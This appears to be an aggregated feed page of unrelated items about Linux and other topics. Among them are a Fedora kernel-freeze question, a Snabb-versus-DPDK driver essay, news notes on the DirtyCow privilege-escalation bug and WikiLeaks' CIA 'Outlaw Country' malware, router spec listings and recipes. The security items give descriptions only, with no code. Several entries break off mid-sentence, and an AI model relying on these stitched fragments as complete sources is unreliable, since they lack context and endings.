Fedora freezes during shutdown and other commands on kernel kernel-4.11.7-200.fc25.x86_64, but not on kernel kernel-4.8.6-300.fc25.x86_64. ![image description](https://lh3.googleusercontent.com/nNlYqNwi3jys2x9k6srjK25pLQeZTkqUDO7DWQnPpcwMBq1UtRxBdSAT5MrUd07AN3UN2JFxzZZPZct-R1WcZk8qKE0lbt0k5razaC6xQ0JfRlrXXZThnLiexz11mRcMxA5xH04Ejq8fkexoKFN5e4SGkDh18p_B9O-IkwjCEU_BMoJ48I8gupxpFJBubjt8WvSAXBWPI6Tti_He34gJJlCfpajKlaSDGy6vTQTq0KP9YXWWiUAvx0zLI-8kftbg7RK5zpEG1g7MW6f9Rfj0vjmwwRus9XIErtkQXZFMJ01W7pJNuKrcez4Xu_vLxwes6PgGRauJE9cXLTq_n1mjBcCKZAST_4BKvFAeTt-IIUukEf_zAAKc2vArcyjKW2z4yzrpcvlJja6TZTSS_lbtsUrSJKgewqFtwTt9Ks51vyLoPH9ubqdRTp0zWExi6c4KIa0dnsEsqVmfRAjCE3n_sJFp7ZugQm9rafe8i2YBityaT4bfXlXY_HyMh3pCpA3yNzr5HMsQmY6fAfkBHl801k7C39n5ebS4s8uKPkqNjkO2b3nyJy0gvMEpiJVfw0VKVkd7r6Y6mS_1JeK8ZyzpabjEaiUEu4vI7OjvfMYvxgXrBn-N6P9h8nQD10aHNeCYJ8qW-sC0UXifCmHyy7YUFKoI0ERT7vr6ibykp904HQ=w1211-h909-no) The whole OS also freezes when I type screenfetch into the terminal, and I cannot move anything. In both of these instances, I have to turn the power off manually. My laptop is a Dell XPS 9560. I do not know if this is relevant or not, but it has the 1050 graphics card. Please give me some ideas on how to fix this.
          Device Driver Development Engineer - Intel - Singapore   
Knowledge of XDSL, ETHERNET switch, wireless LAN, Security Engine and microprocessor is an advantage. Linux Driver/Kernel development for Ethernet/DSL/LTE Modem...
From Intel - Sat, 17 Jun 2017 10:23:08 GMT - View all Singapore jobs
          Andy Wingo: encyclopedia snabb and the case of the foreign drivers   

Peoples of the blogosphere, welcome back to the solipsism! Happy 2017 and all that. Today's missive is about Snabb (formerly Snabb Switch), a high-speed networking project we've been working on at work for some years now.

What's Snabb all about you say? Good question and I have a nice answer for you in video and third-party textual form! This year I managed to make it to linux.conf.au in lovely Tasmania. Tasmania is amazing, with wild wombats and pademelons and devils and wallabies and all kinds of things, and they let me talk about Snabb.

Click to download video

You can check that video on the youtube if the link above doesn't work; slides here.

Jonathan Corbet from LWN wrote up the talk in an article here, which besides being flattering is a real windfall as I don't have to write it up myself :)

In that talk I mentioned that Snabb uses its own drivers. We were recently approached by a customer with a simple and honest question: does this really make sense? Is it really a win? Why wouldn't we just use the work that the NIC vendors have already put into their drivers for the Data Plane Development Kit (DPDK)? After all, part of the attraction of a switch to open source is that you will be able to take advantage of the work that others have produced.

Our answer is that while it is indeed possible to use drivers from DPDK, there are costs and benefits on both sides and we think that when we weigh it all up, it makes both technical and economic sense for Snabb to have its own driver implementations. It might sound counterintuitive on the face of things, so I wrote this long article to discuss some perhaps under-appreciated points about the tradeoff.

Technically speaking there are generally two ways you can imagine incorporating DPDK drivers into Snabb:

  1. Bundle a snapshot of the DPDK into Snabb itself.

  2. Somehow make it so that Snabb could (perhaps optionally) compile against a built DPDK SDK.

As part of a software-producing organization that ships solutions based on Snabb, I need to be able to ship a "known thing" to customers. When we ship the lwAFTR, we ship it in source and in binary form. For both of those deliverables, we need to know exactly what code we are shipping. We achieve that by having a minimal set of dependencies in Snabb -- only LuaJIT and three Lua libraries (DynASM, ljsyscall, and pflua) -- and we include those dependencies directly in the source tree. This requirement of ours rules out (2), so the option under consideration is only (1): importing the DPDK (or some part of it) directly into Snabb.

So let's start by looking at Snabb and the DPDK from the top down, comparing some metrics, seeing how we could make this combination.

                                     Snabb   DPDK
Code lines                           61K     583K
Contributors (all-time)              60      370
Contributors (since Jan 2016)        32      240
Non-merge commits (since Jan 2016)   1.4K    3.2K

These numbers aren't directly comparable, of course; in Snabb our unit of code change is the merge rather than the commit, and in Snabb we include a number of production-ready applications like the lwAFTR and the NFV, but they are fine enough numbers to start with. What seems clear is that the DPDK project is significantly larger than Snabb, so adding it to Snabb would fundamentally change the nature of the Snabb project.

So depending on the DPDK makes it so that suddenly Snabb jumps from being a project that compiles in a minute to being a much more heavy-weight thing. That could be OK if the benefits were high enough and if there weren't other costs, but there are indeed other costs to including the DPDK:

  • Data-plane control. Right now when I ship a product, I can be responsible for the whole data plane: everything that happens on the CPU when packets are being processed. This includes the driver, naturally; it's part of Snabb and if I need to change it or if I need to understand it in some deep way, I can do that. But if I switch to third-party drivers, this is now out of my domain; there's a wall between me and something that is running on my CPU. And if there is a performance problem, I now have someone to blame that's not myself! From the customer perspective this is terrible, as you want the responsibility for software to rest in one entity.

  • Impedance-matching development costs. Snabb is written in Lua; the DPDK is written in C. I will have to build a bridge, and keep it up to date as both Snabb and the DPDK evolve. This impedance-matching layer is also another source of bugs; either we make a local impedance matcher in C or we bind everything using LuaJIT's FFI. In the former case, it's a lot of duplicate code, and in the latter we lose compile-time type checking, which is a no-go given that the DPDK can and does change API and ABI.

  • Communication costs. The DPDK development list had 3K messages in January. Keeping up with DPDK development would become necessary, as the DPDK is now in your dataplane, but it costs significant amounts of time.

  • Costs relating to mismatched goals. Snabb tries to win development and run-time speed by searching for simple solutions. The DPDK tries to be a showcase for NIC features from vendors, placing less of a priority on simplicity. This is a very real cost in the form of the way network packets are represented in the DPDK, with support for such features as scatter/gather and indirect buffers. In Snabb we were able to do away with this complexity by having simple linear buffers, and our speed did not suffer; adding the DPDK again would either force us to marshal and unmarshal these buffers into and out of the DPDK's format, or otherwise to reintroduce this particular complexity into Snabb.

  • Abstraction costs. A network function written against the DPDK typically uses at least three abstraction layers: the "EAL" environment abstraction layer, the "PMD" poll-mode driver layer, and often an internal hardware abstraction layer from the network card vendor. (And some of those abstraction layers are actually external dependencies of the DPDK, as with Mellanox's ConnectX-4 drivers!) Any discrepancy between the goals and/or implementation of these layers and the goals of a Snabb network function is a cost in developer time and in run-time. Note that those low-level HAL facilities aren't considered acceptable in upstream Linux kernels, for all of these reasons!

  • Stay-on-the-train costs. The DPDK is big and sometimes its abstractions change. As a minor player just riding the DPDK train, we would have to invest a continuous amount of effort into just staying aboard.

  • Fork costs. The Snabb project has a number of contributors but is really run by Luke Gorrie. Because Snabb is so small and understandable, if Luke decided to stop working on Snabb or take it in a radically different direction, I would feel comfortable continuing to maintain (a fork of) Snabb for as long as is necessary. If the DPDK changed goals for whatever reason, I don't think I would want to continue to maintain a stale fork.

  • Overkill costs. Drivers written against the DPDK have many considerations that simply aren't relevant in a Snabb world: kernel drivers (KNI), special NIC features that we don't use in Snabb (RDMA, offload), non-x86 architectures with different barrier semantics, threads, complicated buffer layouts (chained and indirect), interaction with specific kernel modules (uio-pci-generic / igb-uio / ...), and so on. We don't need all of that, but we would have to bring it along for the ride, and any changes we might want to make would have to take these use cases into account so that other users won't get mad.

So there are lots of costs if we were to try to hop on the DPDK train. But what about the benefits? The goal of relying on the DPDK would be that we "automatically" get drivers, and ultimately that a network function would be driver-agnostic. But this is not necessarily the case. Each driver has its own set of quirks and tuning parameters; in order for a software development team to be able to support a new platform, the team would need to validate the platform, discover the right tuning parameters, and modify the software to configure the platform for good performance. Sadly this is not a trivial amount of work.

Furthermore, using a different vendor's driver isn't always easy. Consider Mellanox's DPDK ConnectX-4 / ConnectX-5 support: the "Quick Start" guide has you first install MLNX_OFED in order to build the DPDK drivers. What is this thing exactly? You go to download the tarball and it's 55 megabytes. What's in it? 30 other tarballs! If you build it somehow from source instead of using the vendor binaries, then what do you get? All that code, running as root, with kernel modules, and implementing systemd/sysvinit services!!! And this is just step one!!!! Worse yet, this enormous amount of code powering a DPDK driver is mostly driver-specific; what we hear from colleagues whose organizations decided to bet on the DPDK is that you don't get to amortize much knowledge or validation when you switch between an Intel and a Mellanox card.

In the end when we ship a solution, it's going to be tested against a specific NIC or set of NICs. Each NIC will add to the validation effort. So if we were to rely on the DPDK's drivers, we would have paid all the costs but we wouldn't save very much in the end.

There is another way. Instead of relying on so much third-party code that it is impossible for any one person to grasp the entirety of a network function, much less be responsible for it, we can build systems small enough to understand. In Snabb we just read the data sheet and write a driver. (Of course we also benefit by looking at DPDK and other open source drivers as well to see how they structure things.) By only including what is needed, Snabb drivers are typically only a thousand or two thousand lines of Lua. With a driver of that size, it's possible for even a small ISV or in-house developer to "own" the entire data plane of whatever network function you need.

Of course Snabb drivers have costs too. What are they? Are customers going to be stuck forever paying for drivers for every new card that comes out? It's a very good question and one that I know is in the minds of many.

Obviously I don't have the whole answer, as my role in this market is a software developer, not an end user. But having talked with other people in the Snabb community, I see it like this: Snabb is still in relatively early days. What we need are about three good drivers. One of them should be for a standard workhorse commodity 10Gbps NIC, which we have in the Intel 82599 driver. That chipset has been out for a while so we probably need to update it to the current commodities being sold. Additionally we need a couple cards that are going to compete in the 100Gbps space. We have the Mellanox ConnectX-4 and presumably ConnectX-5 drivers on the way, but there's room for another one. We've found that it's hard to actually get good performance out of 100Gbps cards, so this is a space in which NIC vendors can differentiate their offerings.

We budget somewhere between 3 and 9 months of developer time to create a completely new Snabb driver. Of course it usually takes less time to develop Snabb support for a NIC that is only incrementally different from others in the same family that already have drivers.

We see this driver development work to be similar to the work needed to validate a new NIC for a network function, with the additional advantage that it gives us up-front knowledge instead of the best-effort testing later in the game that we would get with the DPDK. When you add all the additional costs of riding the DPDK train, we expect that the cost of Snabb-native drivers competes favorably against the cost of relying on third-party DPDK drivers.

In the beginning it's natural that early adopters of Snabb make investments in this base set of Snabb network drivers, as they would to validate a network function on a new platform. However over time as Snabb applications start to be deployed over more ports in the field, network vendors will also see that it's in their interests to have solid Snabb drivers, just as they now see with the Linux kernel and with the DPDK, and given that the investment is relatively low compared to their already existing efforts in Linux and the DPDK, it is quite feasible that we will see the NIC vendors of the world start to value Snabb for the performance that it can squeeze out of their cards.

So in summary, in Snabb we are convinced that writing minimal drivers that are adapted to our needs is an overall win compared to relying on third-party code. It lets us ship solutions that we can feel responsible for: both for their operational characteristics as well as their maintainability over time. Still, we are happy to learn and share with our colleagues all across the open source high-performance networking space, from the DPDK to VPP and beyond.


          For Love of a Good Book   
My introduction to books was not innocent—not in the least. I was three and curious. Specifically, I wanted to know where babies came from. My father, not the most comfortable of people, harrumphed, cleared his throat, and told me that he was too busy.     I resolved to get the needed information on my own. My uncle, who was in the Army, had stored his medical books in our attic. I had looked at them and knew those pictures contained the kernels of truth; but the words: what might those words
          DirtyCow: The biggest Linux kernel vulnerability ever seen   

The vulnerability has been present since Linux 2.6.22 and affects every system: CentOS, Ubuntu, Debian, Red Hat, and so on. In short, an unprivileged user on the system can gain root privileges.

The vulnerability reportedly enables two things:

  1. An unprivileged user on the system can exploit it to gain write access to read-only files.
  2. It gives a user on the system the ability to modify on-disk binaries, bypassing the permission mechanism that would normally prevent modifications without the appropriate permissions.

Since my systems knowledge is not great, I settled for a rough translation, for those interested.

Sources

https://dirtycow.ninja/
https://github.com/dirtycow/dirtycow.github.io/wik...
https://www.youtube.com/watch?v=kEsshExn7aE
https://bobcares.com/blog/dirty-cow-vulnerability/ (çözüm)
http://arstechnica.com/security/2016/10/android-ph... (android)


          Wikileaks: The CIA develops malware for Linux-based operating systems   

Wikileaks is revealing, as part of the Vault 7 program on its website, all the details of the hundreds of hacking tools the CIA had (and has) at its disposal for all kinds of devices. While yesterday we learned about Elsa, a piece of malware for geolocating users over WiFi, today Outlaw Country has been revealed: the CIA's malware for computers running Linux.

Outlaw Country: used to covertly manipulate network packets on Linux

While practically everything Wikileaks has revealed about the CIA concerns malware for Windows computers, it is especially notable that Outlaw Country is the first tool designed explicitly for Linux, which as we all know is much more secure than other operating systems and patches its vulnerabilities much faster.

Outlaw Country makes it possible to redirect all outgoing traffic from a target computer to computers controlled by the CIA, with the aim of stealing files from the infected machine or sending files to it.

The malware consists of a kernel module that creates hidden netfilter tables on the target Linux computer, with which network packets can be manipulated. Knowing the name of the table, an operator can create rules that take precedence over the existing iptables rules, and these rules cannot be seen by a normal user or even by the system administrator.

Related: https://www.adslzone.net/2017/06/01/es-realmente-mas-seguro-linux-que-windows/

Linux is widely used on servers, which makes it a priority target for the CIA, which seeks to infiltrate other people's networks by any means in order to carry out espionage, as we have seen with other tools such as Brutal Kangaroo or Pandemic.

The malware's most recent document dates from 2015

The malware's installation and persistence mechanism is not described in much detail in the documents Wikileaks had access to. To use this malware, a CIA operator first has to use other exploits or backdoors to inject the kernel module into the target operating system.

Outlaw Country version 1.0 contains a kernel module for the 64-bit version of CentOS/RHEL 6.x. The first release of that branch was published in 2011 and the last in 2013, and it remained the latest available until the summer of 2014, when version 7 arrived. The module only works with the default kernels, and version 1.0 of the malware only supports DNAT (Destination NAT) through the PREROUTING chain.

The document Wikileaks has revealed is dated June 4, 2015. That same document lists as a requirement CentOS 6.x or earlier, with kernel version 2.6.32 (from 2011) or lower. It is not known whether the tool had a more up-to-date version for more recent kernels.

https://www.adslzone.net/2017/06/29/outlaw-country-wikileaks-desvela-malware-de-la-cia-para-linux/

          Devices With Linux: Tesla Cars, 'Internet of Things', Intel Has a New Media SDK for Linux   
  • Tesla starts pushing new Linux kernel update, hinting at upcoming UI improvements

    Albeit being about 6 months late, Tesla finally started pushing the new Linux kernel update to the center console in its vehicles this week.

    While it’s only a backend upgrade, Tesla CEO Elon Musk associated it with several long-awaited improvements to the vehicle’s user interface. Now that the kernel upgrade is here, those improvements shouldn’t be too far behind.

    Sources told Electrek that the latest 8.1 update (17.24.30), upgraded the Linux Kernel from the version 2.6.36 to the version 4.4.35.

  • Is Ubuntu set to be the OS for Internet of Things?

    The Internet of Things has enjoyed major growth in recent years, as more and more of the world around us gets smarter and more connected.

    But keeping all these new devices updated and online requires a reliable and robust software background, allowing for efficient and speedy monitoring and backup when needed.

    Software fragmentation has already become a significant issue across the mobile space, and may threaten to do so soon in the IoT.

    Luckily, Canonical believes it can solve this problem, with its IoT Ubuntu Core OS providing a major opportunity for manufacturers and developers across the world to begin fully monetising and realising the potential of the new connected ecosystem.

  • What's New in Intel Media SDK 2017 R2 for Embedded Linux

    Among the key features this release enables is the Region of Interest (ROI) for HEVC encoder in constant and variable bitrate modes.

    Developers can now control the compression rate of specific rectangular regions in the input stream while keeping the bitrate target. This makes it possible, for example, to reduce compression of the areas where the viewer needs to see more detail (e.g. faces or number plates), or to increase it for backgrounds with complicated textures that would otherwise consume the majority of the bandwidth. ROI can also be used to put a privacy mask on certain regions that have to be blurred (e.g. logos or faces).


          New Kernels and Linux Foundation Efforts   
  • Four new stable kernels
  • Linux Foundation Launches Open Security Controller Project

    The Linux Foundation launched a new open source project focused on security for orchestration of multi-cloud environments.

    The Open Security Controller Project software will automate the deployment of virtualized network security functions — such as firewalls, intrusion prevention systems, and application data controllers — to protect east-west traffic inside the data center.

  • Open Security Controller: Security service orchestration for multi-cloud environments

    The Linux Foundation launched the Open Security Controller project, an open source project focused on centralizing security services orchestration for multi-cloud environments.

  • The Linux Foundation explains the importance of open source in autonomous, connected cars

    Open source computing has always been a major boon to the world of developers, and technology as a whole. Take Google's pioneering Android OS for example, based on the open source code, which can be safely credited with impacting the world of everyday technology in an unprecedented manner when it was introduced. It is, hence, no surprise when a large part of the automobile industry is looking at open source platforms to build on advanced automobile dynamics.


          GNU/Linux Boards: Orange Pi, Le Potato, and Liteboard   
  • Orange Pi Plus 2e OS Installation

    Similar to the Raspberry Pi is the Orange Pi series of single board systems.

    These single boards are not compatible with the Operating System (OS) images for Raspberry Pi. In this article we will cover installing and setting up an OS.

  • New Libre-Focused ARM Board Aims To Compete With Raspberry Pi 3, Offers 4K

    There's another ARM SBC (single board computer) trying to get crowdfunded that could compete with the Raspberry Pi 3 while being a quad-core 64-bit ARM board with 4K UHD display support, up to 2GB RAM, and should be working soon on the mainline Linux kernel.

    The "Libre Computer Board" by the Libre Computer Project is this new Kickstarter initiative, in turn is the work of Shenzhen Libre Technology Co. Through Kickstarter the project is hoping to raise $50k USD. The board is codenamed "Le Potato."

    Le Potato is powered by a quad-core ARM Cortex-A53 CPU while its graphics are backed by ARM Mali-450. Connectivity on the board includes HDMI 2.0, 4 x USB 2.0, 100Mb, eMMC, and microSD. Sadly, no Gigabit Ethernet or USB 3.0. Unlike the Raspberry Pi 3, it also goes without onboard WiFi/Bluetooth.

  • Open spec, sandwich-style SBC runs Linux on i.MX6UL based COM

    Grinn and RS Components unveiled a Linux-ready “Liteboard” SBC that uses an i.MX6 UL LiteSOM COM, with connectors compatible with Grinn Chiliboard add-ons.

    UK-based distributor RS Components is offering a new sandwich-style SBC from Polish embedded firm Grinn. The 60-Pound ($78) Liteboard, which is available with schematics, but no community support site, is designed to work with the separately available, SODIMM-style LiteSOM computer-on-module. The LiteSOM sells for 25 Pounds ($32) or 30 Pounds ($39) with 2GB eMMC flash. It would appear that the 60-Pound Liteboard price includes the LiteSOM, but if so, it’s unclear which version. There are detailed specs on the module, but no schematics.


          Harvest Mostly In   

Last night was our first freeze of the season. I scrambled to take in everything I could that I had not already brought in. As dusk hit and daylight quickly receded, I was pulling bean pods half-blindly. I noticed myself relying more on my sense of touch and less on straining my eyes to discern bean pods from stalks and felted leaves. While I may not have picked every last pod, I did fill a 2-gallon bucket to over-brimming.

The best part of my evening was actually sitting and removing the yin yang beans from their pods. After so many days this week of absorbing current economic events, it was relaxing to sit by a warm fire and watch my harvest amount to a humble, yet substantial hill of beans.


About a week ago, before regular rains returned to our area, I brought in the Indian corn to dry. I can't really explain to you how magical it was to pull back the different hued husks and find jewel-toned kernels shining in unpredictable colors beneath. That was quite a memorable moment.

There are still apples to be brought in from the frosts and fall veggies to be transplanted into their winter beds. The garden season is nearing a close but it remains a race to the finish.
          Offer - WR562-S - CHINA   
WR562-S - 300Mbps wireless AP with IEEE 802.3af/at 48V PoE power supply

Product features:
  • Strong wireless coverage with an internal high-gain MIMO antenna.
  • Optional various colors; custom colors also available.
  • Safe and stable IEEE 802.3af/at PoE power supply.
  • Qualcomm Atheros MCU with a MIPS 24K core for high performance and stability.
  • The external power switch can be locked for hotel use; also suitable for home use.
  • Terminal roaming across APs within a local wireless network.
  • Soft AC software supported for centralized management.
  • MAC address white list supported to guarantee access security.
  • Gateway/AP modes supported.

Specification - hardware:
  MCU chipset: Qualcomm Atheros AR9331
  Power input: PoE (802.3af/at), 48V
  Interfaces: 1 x 10/100Mbps WAN port (auto MDI/MDIX), 1 x 10/100Mbps LAN port (auto MDI/MDIX), 1 reset button, 1 power button
  Wireless standards: IEEE 802.11n, IEEE 802.11g, IEEE 802.11b
  Antenna: internal 5dBi high-gain MIMO antenna

Specification - wireless:
  Frequency: 2.4-2.4835GHz
  Channels: 1-13
  Signal rate: 11n up to 150Mbps (dynamic), 11g up to 54Mbps (dynamic), 11b up to 11Mbps (dynamic)
  EIRP
          Offer - WR511 - CHINA   
WR511

Product features:
  • Strong wireless coverage with an internal high-gain MIMO antenna.
  • Optional various colors; custom colors also available.
  • 24V non-standard PoE using the 45+/78- wire pairs of the cable; supports a 9-24V wide voltage supply.
  • Qualcomm Atheros MCU with a MIPS 24K core for high performance and stability.
  • The external power switch can be locked for hotel use; also suitable for home use.
  • Terminal roaming across APs within a local wireless network.
  • Soft AC software supported for centralized management.
  • MAC address white list supported to guarantee access security.
  • Gateway/AP modes supported.

Specification - hardware:
  MCU chipset: Qualcomm Atheros AR9331
  Power input: Simplified PoE (45+/78-), 9-24V
  Interfaces: 1 x 10/100Mbps WAN port (auto MDI/MDIX), 1 x 10/100Mbps LAN port (auto MDI/MDIX), 1 reset button, 1 power button
  Wireless standards: IEEE 802.11n, IEEE 802.11g, IEEE 802.11b
  Antenna: internal 5dBi high-gain MIMO antenna

Specification - wireless:
  Frequency: 2.4-2.4835GHz
  Channels: 1-13
  Signal rate: 11n up to 150Mbps (dynamic), 11g up to 54Mbps (dynamic), 11b up to 11Mbps (dynamic)
  EIRP
          Offer - WR511-D - CHINA   
WR511-D

Product features:
  • Strong wireless coverage with an internal high-gain MIMO antenna.
  • Optional various colors; custom colors also available.
  • External 9V DC power adapter supply; the DC socket is in the lower right corner.
  • Qualcomm Atheros MCU with a MIPS 24K core for high performance and stability.
  • The external power switch can be locked for hotel use; also suitable for home use.
  • Terminal roaming across APs within a local wireless network.
  • Soft AC software supported for centralized management.
  • MAC address white list supported to guarantee access security.
  • Gateway/AP modes supported.

Specification - hardware:
  MCU chipset: Qualcomm Atheros AR9331
  Power input: 9V power adapter
  Interfaces: 1 x 10/100Mbps WAN port (auto MDI/MDIX), 1 x 10/100Mbps LAN port (auto MDI/MDIX), 1 reset button, 1 power button
  Wireless standards: IEEE 802.11n, IEEE 802.11g, IEEE 802.11b
  Antenna: internal 5dBi high-gain MIMO antenna

Specification - wireless:
  Frequency: 2.4-2.4835GHz
  Channels: 1-13
  Signal rate: 11n up to 150Mbps (dynamic), 11g up to 54Mbps (dynamic), 11b up to 11Mbps (dynamic)
  EIRP
          Offer - WR513-S - CHINA   
WR513-S

Product features:
  • Strong wireless coverage with an internal high-gain MIMO antenna.
  • Optional various colors; custom colors also available.
  • Safe and stable IEEE 802.3af/at PoE power supply.
  • Qualcomm Atheros MCU with a MIPS 24K core for high performance and stability.
  • The external power switch can be locked for hotel use; also suitable for home use.
  • Terminal roaming across APs within a local wireless network.
  • Soft AC software supported for centralized management.
  • MAC address white list supported to guarantee access security.
  • Gateway/AP modes supported.

Specification - hardware:
  MCU chipset: Qualcomm Atheros AR9331
  Power input: PoE (802.3af/at), 48V
  Interfaces: 1 x 10/100Mbps WAN port (auto MDI/MDIX), 1 x 10/100Mbps LAN port (auto MDI/MDIX), 1 reset button, 1 power button
  Wireless standards: IEEE 802.11n, IEEE 802.11g, IEEE 802.11b
  Antenna: internal 5dBi high-gain MIMO antenna

Specification - wireless:
  Frequency: 2.4-2.4835GHz
  Channels: 1-13
  Signal rate: 11n up to 150Mbps (dynamic), 11g up to 54Mbps (dynamic), 11b up to 11Mbps (dynamic)
  EIRP
          Offer - WR510 - CHINA   
WR510

Product features:
  • Strong wireless coverage with an internal high-gain MIMO antenna.
  • Optional various colors; custom colors also available.
  • 24V non-standard PoE using the 45+/78- wire pairs of the cable; supports a 9-24V wide voltage supply.
  • Qualcomm Atheros MCU with a MIPS 24K core for high performance and stability.
  • The external power switch can be locked for hotel use; also suitable for home use.
  • Terminal roaming across APs within a local wireless network.
  • Soft AC software supported for centralized management.
  • MAC address white list supported to guarantee access security.
  • Gateway/AP modes supported.

Specification - hardware:
  MCU chipset: Qualcomm Atheros AR9331
  Power input: Simplified PoE (45+/78-), 9-24V
  Interfaces: 1 x 10/100Mbps WAN port (auto MDI/MDIX), 1 x 10/100Mbps LAN port (auto MDI/MDIX), 1 reset button, 1 power button
  Wireless standards: IEEE 802.11n, IEEE 802.11g, IEEE 802.11b
  Antenna: internal 5dBi high-gain MIMO antenna

Specification - wireless:
  Frequency: 2.4-2.4835GHz
  Channels: 1-13
  Signal rate: 11n up to 150Mbps (dynamic), 11g up to 54Mbps (dynamic), 11b up to 11Mbps (dynamic)
  EIRP
          Offer - WR512-D - CHINA   
WR512-D

Product features:
  • Strong wireless coverage with an internal high-gain MIMO antenna.
  • Optional various colors; custom colors also available.
  • External 9V DC power adapter supply; the DC socket is in the lower right corner.
  • Qualcomm Atheros MCU with a MIPS 24K core for high performance and stability.
  • The external power switch can be locked for hotel use; also suitable for home use.
  • Terminal roaming across APs within a local wireless network.
  • Soft AC software supported for centralized management.
  • MAC address white list supported to guarantee access security.
  • Gateway/AP modes supported.

Specification - hardware:
  MCU chipset: Qualcomm Atheros AR9331
  Power input: 9V power adapter
  Interfaces: 1 x 10/100Mbps WAN port (auto MDI/MDIX), 1 x 10/100Mbps LAN port (auto MDI/MDIX), 1 reset button, 1 power button
  Wireless standards: IEEE 802.11n, IEEE 802.11g, IEEE 802.11b
  Antenna: internal 5dBi high-gain MIMO antenna

Specification - wireless:
  Frequency: 2.4-2.4835GHz
  Channels: 1-13
  Signal rate: 11n up to 150Mbps (dynamic), 11g up to 54Mbps (dynamic), 11b up to 11Mbps (dynamic)
  EIRP
          Offer - WR510-D - CHINA   
WR510-D

Product features:
  • Strong wireless coverage with an internal high-gain MIMO antenna.
  • Optional various colors; custom colors also available.
  • External 9V DC power adapter supply; the DC socket is in the lower right corner.
  • Qualcomm Atheros MCU with a MIPS 24K core for high performance and stability.
  • The external power switch can be locked for hotel use; also suitable for home use.
  • Terminal roaming across APs within a local wireless network.
  • Soft AC software supported for centralized management.
  • MAC address white list supported to guarantee access security.
  • Gateway/AP modes supported.

Specification - hardware:
  MCU chipset: Qualcomm Atheros AR9331
  Power input: 9V power adapter
  Interfaces: 1 x 10/100Mbps WAN port (auto MDI/MDIX), 1 x 10/100Mbps LAN port (auto MDI/MDIX), 1 reset button, 1 power button
  Wireless standards: IEEE 802.11n, IEEE 802.11g, IEEE 802.11b
  Antenna: internal 5dBi high-gain MIMO antenna

Specification - wireless:
  Frequency: 2.4-2.4835GHz
  Channels: 1-13
  Signal rate: 11n up to 150Mbps (dynamic), 11g up to 54Mbps (dynamic), 11b up to 11Mbps (dynamic)
  EIRP
          Offer - WR513-AC - CHINA   
WR513-AC

Product features:
  • Strong wireless coverage with an internal high-gain MIMO antenna.
  • Optional various colors; custom colors also available.
  • 110-220V AC power supply; the AC connection is at the back of the product.
  • Qualcomm Atheros MCU with a MIPS 24K core for high performance and stability.
  • The external power switch can be locked for hotel use; also suitable for home use.
  • Terminal roaming across APs within a local wireless network.
  • Soft AC software supported for centralized management.
  • MAC address white list supported to guarantee access security.
  • Gateway/AP modes supported.

Specification - hardware:
  MCU chipset: Qualcomm Atheros AR9331
  Power input: 110-220V AC power supply
  Interfaces: 1 x 10/100Mbps WAN port (auto MDI/MDIX), 1 x 10/100Mbps LAN port (auto MDI/MDIX), 1 reset button, 1 power button
  Wireless standards: IEEE 802.11n, IEEE 802.11g, IEEE 802.11b
  Antenna: internal 5dBi high-gain MIMO antenna

Specification - wireless:
  Frequency: 2.4-2.4835GHz
  Channels: 1-13
  Signal rate: 11n up to 150Mbps (dynamic), 11g up to 54Mbps (dynamic), 11b up to 11Mbps (dynamic)
  EIRP
          Mexicali Frittata Recipe   
 One of my favorite things to make is a frittata. They are easy and you can be very creative with your ingredients. Guests at our bed and breakfast always seem to enjoy them, which really makes me happy.

I love Mexican food and when sisters Nadine and Sandy, who visit our inn often, told me they loved it too, I decided to see if I could come up with a recipe for a frittata that they and their husbands would enjoy. I have been serving this now for a couple of years and I want to share it with you.

When I make this, I use two 8 x 8 glass dishes because the frittata bakes quicker and more evenly than in a larger dish. If I am serving 10 guests for breakfast, I use 3 dishes.

Jan’s Mexicali Frittata

Serves 8
10 eggs
1 teaspoon sea salt
Lemon pepper
½ teaspoon onion powder
½ teaspoon garlic powder
Chopped fresh cilantro
Dollop low fat or fat-free sour cream
4 small shallots, sliced
1 cup black beans, rinsed and drained
1 cup roasted corn kernels, Trader Joe’s frozen-thawed and drained
2 small cans mild green chilies, drained
¼ cup sundried tomatoes, cut in small pieces
1 cup milk or sour cream
Mexican cheese blend with spices (about a cup; more if you like it really cheesy)
4 small corn tortillas

Topping:  1 cup sour cream, 1 cup salsa, chopped parsley, chopped cilantro

Preheat oven to 375. Spray 2 square baking dishes liberally with cooking spray.  Put a light layer of the cheese blend on the bottom of the dish. Cut tortillas in half and cover bottom of baking dishes.  Layer shallots, black beans, roasted corn, chilies, cilantro, cheese blend, and sundried tomatoes.  Whip eggs with onion powder, garlic powder, small amount of low fat sour cream, sea salt, lemon pepper, and milk. Add parsley and cilantro.  Pour egg mixture evenly over layered veggies.  Finish off with another light layer of cheese blend.  Bake for about 30 minutes or until set. Cool for 5 minutes, cut into triangles or squares.
Top each serving with a dollop of sour cream, salsa, and sprinkle with cilantro and parsley.

This dish is great served warm or at room temperature. For breakfast, I love to serve this with chunks of peach & chipotle chicken sausage and pineapple that have been skewered and baked in the oven for about 15 minutes. Yum, yum.
          Rosemary-Roasted Corn Muffins - Cape Cod Bed and Breakfast Recipe   
 We serve many kinds of freshly baked muffins at our Cape Cod Bed and Breakfast. One of the most popular with our guests is Rosemary-Roasted Corn Muffins made with corn meal that is ground at the historic Dexter Grist Mill. The mill is just across the street from the Inn and is one of the oldest operating grist mills in the country. It is one of the few mills that still uses water power to grind corn. The meal is packaged and sold on site. It is a bit more coarsely ground than other corn meals and has no preservatives. When used in muffins, it provides a wonderful texture. Many of our guests purchase the corn meal to take home with them when they visit the mill.

If you do not have roasted corn kernels, plain ones can be substituted. These muffins are also great made with blueberries instead of corn kernels.

Rosemary-Roasted Corn Muffins

Makes 1 dozen regular sized muffins or 6 very large muffins.

1 cup all purpose flour
1 cup coarse yellow cornmeal
½ cup sugar
1 ½ teaspoons baking powder
¼ teaspoon baking soda
¼ teaspoon salt
1 teaspoon minced fresh rosemary
1 cup roasted corn kernels (I use Trader Joe’s, but plain corn kernels can be substituted)
1 cup buttermilk
1 large egg, slightly beaten
¼ cup Canola oil (can substitute melted butter)
Vegetable-oil cooking spray.

Preheat oven to 375 degrees.
Spray muffin tins with cooking spray (I use Pam)
Whisk together dry ingredients including rosemary.
Stir in corn kernels.
Combine buttermilk, egg, and oil in a small bowl and then add to flour.
Stir just until combined.
Spoon batter into muffin cups.
Optional-sprinkle with minced rosemary.
Bake 15 to 18 minutes or until tops are golden and a toothpick inserted into the center of the muffins comes out clean. Let cool in the tin or on a wire rack. Serve warm or at room temperature.
Muffins can be stored in an airtight container for several days or frozen for up to two months.

We serve these muffins warm with blueberry jam from the Jam Kitchen at the Green Briar Nature Center.

Enjoy!
          What Excites Me The Most About The Linux 4.12 Kernel   
